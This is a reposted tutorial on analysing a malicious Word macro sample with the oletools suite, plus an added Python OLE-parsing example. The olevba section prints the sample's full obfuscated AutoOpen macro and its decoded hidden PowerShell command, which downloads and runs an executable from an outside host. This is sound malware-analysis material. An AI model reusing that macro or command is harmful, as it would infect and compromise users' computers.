Analysing Office macro malware samples with the oletools suite


Section 0: Introduction to the oletools suite

oletools is a set of tools with powerful analysis capabilities, written for Office documents. This article covers installing and using oletools on Python 2.7.

(1) Python version requirement: 2.7.9 or later

(2) Installation: pip install -U https://github.com/decalage2/oletools/archive/master.zip

(3) Usage: in CMD, PowerShell or a Linux shell, the tool name is used directly as a command (for example, mraptor sample.doc).


Section 1: The tools

1. mraptor: checks whether a sample looks malicious.


The verdict is SUSPICIOUS. The three flag positions printed next to it are A, W and X; they are detection flags, not permissions. A means an auto-executing trigger such as AutoOpen was found, W means the macro writes to the file system or the registry, and X means it executes something outside the VBA context (Shell, CreateObject and the like). For this sample A and X are set and W is not; mraptor reports SUSPICIOUS whenever A is combined with either W or X.

2. olebrowse: a small "browser" for viewing the contents of an OLE file.


3. oledir: lists the OLE directory entries inside a document.


The OLE directory is a data structure that holds the names of the storages and streams in the file and the location of each stream's data (see [MS-CFB]). Each directory entry is either in use or completely empty (unused).

4. olemap: displays the file's sector map, i.e. its FAT (sector allocation table).
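The directory and the FAT that oledir and olemap display are simple enough to read with a few dozen lines of Python. The block below is an added example, not part of the article or of oletools: it first builds a small compound file from scratch (header, one FAT sector, one directory sector and a 4100-byte stream, all constructed here), then parses the header, follows the FAT chain and lists the directory entries the way oledir does. The field layouts and sentinel values are those of [MS-CFB]; the stream name WordDocument and its contents are invented for the example.

```python
import struct

# Constants and layouts from [MS-CFB]. Everything else here is constructed
# for the example; it is not code from the article or from oletools.
MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"
FREESECT, ENDOFCHAIN, FATSECT = 0xFFFFFFFF, 0xFFFFFFFE, 0xFFFFFFFD
NOSTREAM = 0xFFFFFFFF
HEADER_FMT = "<HHHHH6sIIIIIIIII"    # header fields from offset 24 to 76
DIRENT_FMT = "<64sHBBIII16sIQQIQ"   # one 128-byte directory entry
TYPE_NAMES = {0: "Empty", 1: "Storage", 2: "Stream", 5: "Root"}

# Constructed stream body: 4100 bytes, above the 4096-byte mini stream cutoff,
# so it is stored in regular sectors and can be followed through the FAT.
PAYLOAD = (b"[MS-CFB] stream body " * 200)[:4100]


def dir_entry(name, obj_type, child, start, size):
    """Pack one directory entry; sibling pointers are left as NOSTREAM."""
    raw = name.encode("utf-16-le") + b"\x00\x00"
    return struct.pack(DIRENT_FMT, raw, len(raw), obj_type, 1, NOSTREAM, NOSTREAM,
                       child, b"\x00" * 16, 0, 0, 0, start, size)


def build_sample():
    """Header, FAT in sector 0, directory in sector 1, PAYLOAD in sectors 2-10."""
    n_data = -(-len(PAYLOAD) // 512)                                  # 9 sectors
    fat = [FATSECT, ENDOFCHAIN] + list(range(3, 2 + n_data)) + [ENDOFCHAIN]
    fat += [FREESECT] * (128 - len(fat))
    difat = [0] + [FREESECT] * 108                  # header DIFAT: FAT is sector 0
    header = (MAGIC + b"\x00" * 16
              + struct.pack(HEADER_FMT, 0x3E, 3, 0xFFFE, 9, 6, b"\x00" * 6,
                            0, 1, 1, 0, 0x1000, ENDOFCHAIN, 0, ENDOFCHAIN, 0)
              + struct.pack("<109I", *difat))
    directory = (dir_entry("Root Entry", 5, 1, ENDOFCHAIN, 0)
                 + dir_entry("WordDocument", 2, NOSTREAM, 2, len(PAYLOAD))
                 + b"\x00" * 256)                           # two unused entries
    return (header + struct.pack("<128I", *fat) + directory
            + PAYLOAD.ljust(n_data * 512, b"\x00"))


def parse_header(buf):
    """Decode the header fields that oledir and olemap rely on."""
    if buf[:8] != MAGIC:
        raise ValueError("not a compound file: bad signature")
    f = struct.unpack_from(HEADER_FMT, buf, 24)
    return {"version": (f[1], f[0]), "sector_size": 1 << f[3],
            "mini_sector_size": 1 << f[4], "num_fat_sectors": f[7],
            "first_dir_sector": f[8], "mini_cutoff": f[10],
            "difat": list(struct.unpack_from("<109I", buf, 76))}


def sector(buf, n, size):
    """Sector n starts at (n + 1) * size because the header takes the first slot."""
    return buf[(n + 1) * size:(n + 2) * size]


def load_fat(buf, hdr):
    """Concatenate the FAT sectors named by the header DIFAT (enough for files
    small enough not to need extra DIFAT sectors)."""
    size = hdr["sector_size"]
    fat = []
    for s in hdr["difat"][:hdr["num_fat_sectors"]]:
        fat.extend(struct.unpack("<%dI" % (size // 4), sector(buf, s, size)))
    return fat


def chain(fat, start):
    """Follow a FAT chain. Loops and out-of-range links are rejected: a crafted
    file can point sectors at each other to hang a naive parser."""
    out, s = [], start
    while s != ENDOFCHAIN:
        if s >= len(fat) or s in out:
            raise ValueError("corrupt FAT chain at sector %d" % s)
        out.append(s)
        s = fat[s]
    return out


def read_stream(buf, hdr, fat, start, size=None):
    data = b"".join(sector(buf, s, hdr["sector_size"]) for s in chain(fat, start))
    return data if size is None else data[:size]


def directory(buf, hdr, fat):
    """One row per 128-byte entry of the directory stream, as oledir lists them."""
    raw = read_stream(buf, hdr, fat, hdr["first_dir_sector"])
    entries = []
    for off in range(0, len(raw), 128):
        (name, nlen, typ, _color, left, right, child, _clsid,
         _state, _ctime, _mtime, start, size) = struct.unpack_from(DIRENT_FMT, raw, off)
        entries.append({"id": off // 128,
                        "name": name[:max(nlen - 2, 0)].decode("utf-16-le"),
                        "type": TYPE_NAMES.get(typ, "Unknown(%d)" % typ),
                        "left": left, "right": right, "child": child,
                        "start": start, "size": size})
    return entries


if __name__ == "__main__":
    buf = build_sample()
    hdr = parse_header(buf)
    fat = load_fat(buf, hdr)
    for e in directory(buf, hdr, fat):
        print(e["id"], e["type"], repr(e["name"]), "start", e["start"], "size", e["size"])
```

Two points carry over to real samples. Streams smaller than the mini stream cutoff (4096 bytes by default) are not in the FAT at all but in the mini FAT reachable from the root entry, which is why the example deliberately uses a 4100-byte stream. And chain() refuses to follow a looping or out-of-range FAT chain; malformed chains are one of the classic ways a hostile document makes a parser spin or read outside the file, so a triage tool must check for them rather than trust the sector numbers.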


5. olevba: the tool for a full analysis of a document's macros (run olevba -h for the list of options). Before olevba, the sample is passed through oleobj, which extracts embedded OLE objects; here it prints only the file name and size, so there were no embedded objects to extract. olevba is then run on the same file:

C:\Python27\Lib\site-packages\oletools>oleobj C:\20701.doc
oleobj 0.51 - http://decalage.info/oletools
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/oletools/issues

-------------------------------------------------------------------------------
File: 'C:\\20701.doc' - 41472 bytes

C:\Python27\Lib\site-packages\oletools>olevba C:\20701.doc
olevba 0.51dev1 - http://decalage.info/python/oletools
Flags        Filename
-----------  -----------------------------------------------------------------
OLE:MAS--B-- C:\20701.doc
===============================================================================
FILE: C:\20701.doc
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: C:\20701.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Function voxakudr()
    tidmifjec = "76724"
    voxakudr = tidmifjec
End Function

Function kameci()
    kameci = "hyvnexock"
End Function

Function turjosm()
    pbyhbipa = "62062"
    turjosm = pbyhbipa
End Function

Function cmypfatp()
    zriknu = Empty
    cmypfatp = zriknu
End Function

Sub AutoOpen()
    ywobgitk = 75
    Dim abafa As String
    danxo = ActiveDocument.Windows.Count
    fqumbu = False
    edwale = 43
    Select Case edwale
        Case "2183"
            If (TypeName(voxakudr) = "String") Then
                syqyqqaty = "sybicv"
                x = "ipdufg" & 9
                ic = False
                hs = "uhas" & 684
            End If
            If (fqumbu = 80) Then
                kica = 571
                If (kica < 722) Then
                    gyxyhladjo = Empty
                    ozhelc = "63238"
                    E = "24075" & 10
                    us = 58
                    qbyqewmi = 13
                End If
            End If
            ltewbir = 40
            If (ltewbir = 75) Then
                a = "rjeqi" & 41
                ungopufda = False
                E = Empty
            End If
        Case 43
            If (danxo = 1) Then
caqo = "CipfmipfDipf.ipfEipfXipfeipf ipf/ipfcipf ipf""ipfPipfoipfWipfEipfRipfsipfhipfEipflipflipf.ipfeipfxipfeipf ipf ipf ipf ipf-ipfeipfXipfEipfCipfuipfTipfiipfOipfnipfPipfOipflipfiipfcipfYipf ipf ipf ipf ipf ipfbipfYipfpipfaipfSipfSipf ipf-ipfNipfoipfpipfripfOipffipfIipflipfEipf ipf ipf ipf ipf-ipfWipfiipfnipfDipfOipfWipfsipfTipfyipfLipfEipf ipfHipfiipfdipfDipfEipfnipf ipf ipf ipf ipf ipf(ipfNipfEipfwipf-ipfoipfBipfjipfeipfCipfTipf ipfSipfyipfsipftipfEipfMipf.ipfNipfEipfTipf.ipfWipfeipfbipfCipfLipfiipfEipfnipftipf)ipf.ipfdipfoipfwipfNipflipfoipfaipfdipffipfiipfLipfeipf(ipf'ipfhipftipftipfpipf:ipf/ipf/ipfuipfnipfiipftipftipfoipfgipfripfeipfaipfsipf.ipftipfoipfpipf/ipfsipfeipfaipfripfcipfhipf.ipfpipfhipfpipf'ipf,ipf'ipf%ipfaipfpipfPipfdipfAipfTipfaipf%ipf.ipfeipfxipfEipf'ipf)ipf;ipfsipfTipfAipfripftipf-ipfpipfRipfoipfcipfEipfsipfsipf ipf'ipf%ipfAipfpipfPipfDipfAipfTipfaipf%ipf.ipfEipfxipfeipf'ipf"""

                vbiclazp = "ipf"
                imvuse = Split(caqo, vbiclazp)
                For Each egazejk In imvuse
                    abafa = abafa + egazejk
                Next egazejk
                onol = Shell(abafa, ndycimt)
            End If
    End Select
End Sub

+------------+----------------+-----------------------------------------+
| Type       | Keyword        | Description                             |
+------------+----------------+-----------------------------------------+
| AutoExec   | AutoOpen       | Runs when the Word document is opened   |
| Suspicious | Shell          | May run an executable file or a system  |
|            |                | command                                 |
| Suspicious | Windows        | May enumerate application windows (if   |
|            |                | combined with Shell.Application object) |
| Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
|            |                | may be used to obfuscate strings        |
|            |                | (option --decode to see all)            |
+------------+----------------+-----------------------------------------+

In the triage line at the top, OLE:MAS--B--, the eight flag positions are M (VBA macros present), A (auto-executable macro), S (suspicious keywords), I (IOCs), H (hex strings), B (Base64 strings), D (Dridex strings) and V (VBA strings); a dash means that flag was not raised. The keyword table explains the A, S and B hits: AutoOpen fires when the document is opened, Shell runs the assembled command, and Windows matches ActiveDocument.Windows.Count. The Windows hit is not window enumeration here: the macro only runs its payload when exactly one document window is open, most likely a cheap check against analysis environments. Nothing in the code is actually Base64-encoded either; the real obfuscation is the separator string "ipf" inserted between every character of the command.

Most of the macro is padding. edwale is fixed at 43, so the Case "2183" branch never executes, and the helper functions voxakudr, kameci, turjosm and cmypfatp are never called. The live path is Case 43: Split(caqo, "ipf") removes the separator, the For Each loop concatenates the pieces into abafa, and Shell executes the result. The original randomises letter case and pads with runs of spaces to defeat naive signatures; normalised to lower case and single spaces, and with VBA's doubled-quote escaping undone, the command is:

cmd.exe /c "powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http://unittogreas.top/search.php','%appdata%.exe');start-process '%appdata%.exe'"

It downloads http://unittogreas.top/search.php with WebClient.DownloadFile and starts the result. Note the drop path: %APPDATA% expands to the directory C:\Users\<user>\AppData\Roaming, so '%appdata%.exe' becomes C:\Users\<user>\AppData\Roaming.exe, a file next to the Roaming folder rather than inside it, which is where a responder should look for the payload.

 


Disclaimer: the articles reposted on this site are for personal study and reference; the site accepts no legal responsibility for copyright. If your rights have been infringed, contact yoyou2525@163.com to have the article removed.

Guangdong ICP registration 18138465   © 2018-2025 CODEPRJ.COM